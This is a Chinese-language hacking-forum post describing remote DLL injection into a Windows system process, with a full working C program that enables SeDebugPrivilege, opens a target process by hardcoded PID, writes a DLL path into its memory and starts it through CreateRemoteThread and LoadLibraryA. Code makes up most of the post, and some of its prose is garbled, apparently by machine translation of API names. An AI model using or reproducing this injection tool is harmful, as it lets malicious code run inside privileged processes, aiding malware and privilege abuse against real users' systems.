Jump to content
  • Hello visitors, welcome to the Hacker World Forum!

    Red Team 1949  (formerly CHT Attack and Defense Team) In this rapidly changing Internet era, we maintain our original intention and create the best community to jointly exchange network technologies. You can obtain hacker attack and defense skills and knowledge in the forum, or you can join our Telegram communication group to discuss and communicate in real time. All kinds of advertisements are prohibited in the forum. Please register as a registered user to check our usage and privacy policy. Thank you for your cooperation.

    TheHackerWorld Official

远程注入(系统进程)

 Share


Recommended Posts

最近在看windows黑客编程的pdf,再看一下破解SESSION的0隔离线程发现。发现直接将dll注入到
系统进程是网上的,试了一下发现行不通,代码也行了。都是在208上测的,而且还有几个
联想的函数有多大差别。然后到不是权限的问题,试了一下确实是

实际的API函数

远程注入:

  • 开放式进程
  • VirtualAllocEx
  • 写进程内存
  • 创建远程线程

特权开启:

  • OpenProcessToken
  • 查找特权值A
  • AdjustTokenPrivileges

复现过程

开启SeDebugPrivilege特权

bool EnbalePrivileges() {
        HANDLE hToken = NULL;
        LUID luidValue = { 0 };
        TOKEN_PRIVILEGES tp = { 0 };
        DWORD wdret = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,  &hToken);
        if (wdret == NULL) {
               errorprint("OpenProcessToken");
        }
        BOOL privilege=LookupPrivilegeValueA(NULL,"SeDebugPrivilege",&luidValue); //检索本地唯一性标识符的特定系统上用于局部地(LUID)表示指定的权限名称
        if (privilege == false) {
               errorprint("LookupPrivilegeValueA Privilege:SeDebugPrivilege");
        }
        tp.PrivilegeCount = 1;
        tp.Privileges[0].Luid = luidValue;
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        bool bRet = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL); //设置特权开启/关闭
        if (bRet == false) {
               errorprint("Enable Privilege Failure\n");
        }
        if (GetLastError() == ERROR_SUCCESS) {
               printf("Enable Privilege:SeDebugPrivilege Sucess\n");
        }
}

完整代码

#include "stdafx.h"
#include <Windows.h>
#define errorprint(name){printf("%s Error Code:%d\n",name,GetLastError());return 1;}
bool EnbalePrivileges() {
        HANDLE hToken = NULL;
        LUID luidValue = { 0 };
        TOKEN_PRIVILEGES tp = { 0 };
        DWORD wdret = OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES,  &hToken);
        if (wdret == NULL) {
               errorprint("OpenProcessToken");
        }
        BOOL privilege=LookupPrivilegeValueA(NULL,"SeDebugPrivilege",&luidValue);
        if (privilege == false) {
               errorprint("LookupPrivilegeValueA Privilege:SeDebugPrivilege");
        }
        tp.PrivilegeCount = 1;
        tp.Privileges[0].Luid = luidValue;
        tp.Privileges[0].Attributes = SE_PRIVILEGE_ENABLED;
        bool bRet = AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL);
        if (bRet == false) {
               errorprint("Enable Privilege Failure\n");
        }
        if (GetLastError() == ERROR_SUCCESS) {
               printf("Enable Privilege:SeDebugPrivilege Sucess\n");
        }
}
int main()
{
        int pid = 1148;
        EnbalePrivileges();
        char *dllname = "C:\\Users\\JiuShi\\Desktop\\testdll.dll";
        int dllnamesize = strlen(dllname) * 2;
        HANDLE pidmodule = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid);
        if (pidmodule == NULL) {
               printf("OpenProcess Error Code:%d\n", GetLastError());
               return 1;
        }
        printf("OpenProcess HANDLE 0x%x\n", pidmodule);
        LPVOID vaeAddr = VirtualAllocEx(pidmodule, NULL, dllnamesize, MEM_COMMIT,  PAGE_READWRITE);
        if (vaeAddr == NULL) {
               printf("VirtualAllocEx Error Code:%d\n", GetLastError());
               return 1;
        }
        printf("VirtualAllocEx Sucess 0x%x\n", vaeAddr);
        if (false == WriteProcessMemory(pidmodule, vaeAddr, dllname, dllnamesize, NULL)) {
               printf("WriteProcessMemory Error Code:%d\n", GetLastError());
               return 1;
        }
        printf("WriteProcessMemory Sucess\n");
        FARPROC loadaddress = GetProcAddress(GetModuleHandleA("Kernel32.dll"),  "LoadLibraryA");
        if (loadaddress == NULL) {
               printf("Get Kernel32 Address Error Code:%d\n", GetLastError());
               return 1;
        }
        printf("Get Function LoadlibraryA Function Address:0x%x\n", loadaddress);
        HANDLE runthread = CreateRemoteThread(pidmodule, NULL, 0,  (LPTHREAD_START_ROUTINE)loadaddress, vaeAddr, 0, NULL);
        if (runthread == NULL) {
               printf("CreateRemoteThread Error Code:%d\n", GetLastError());
        }
        printf("CreateRemoteThread Sucess\n");
        system("pause");
    return 0;
}
6BMHaD.png

参考链接

https://blog.csdn.net/weixin_41890599/article/details/108771480

Link to post
Link to comment
Share on other sites

 Share

discussion group

discussion group

    You don't have permission to chat.
    • Recently Browsing   0 members

      • No registered users viewing this page.
    ×
    ×
    • Create New...